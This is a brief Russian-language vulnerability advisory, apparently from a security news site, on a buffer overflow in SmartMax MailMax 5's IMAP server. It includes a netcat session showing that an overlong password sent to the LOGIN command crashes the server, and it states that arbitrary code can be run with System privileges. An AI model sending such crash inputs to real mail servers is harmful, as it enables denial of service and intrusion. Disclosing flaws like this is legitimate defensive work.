Переполнение буфера обнаружено в SmartMax
Software MailMax e-mail server. Удаленный пользователь может аварийно завершить работу сервера. Также удаленный пользователь может выполнить произвольный код с System привилегиями. 

Переполнение происходит, когда удаленный пользователь посылает специально сформированное значение параметра password для команды IMAP Login: 

nc 127.0.0.1 143
* OK IMAP4rev1 SmartMax IMAPMax 5 Ready
0000 CAPABILITY
* CAPABILITY IMAP4rev1
0000 OK CAPABILITY completed
0001 LOGIN "mail@mail.com" "A..[50] ..A"
0001 NO Invalid user name or password.
0001 NO Invalid user name or password.

Уязвимость обнаружена в MailMax 5.

  • Подпишись на наc в Telegram!

    Только важные новости и лучшие статьи

    Подписаться

  • Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии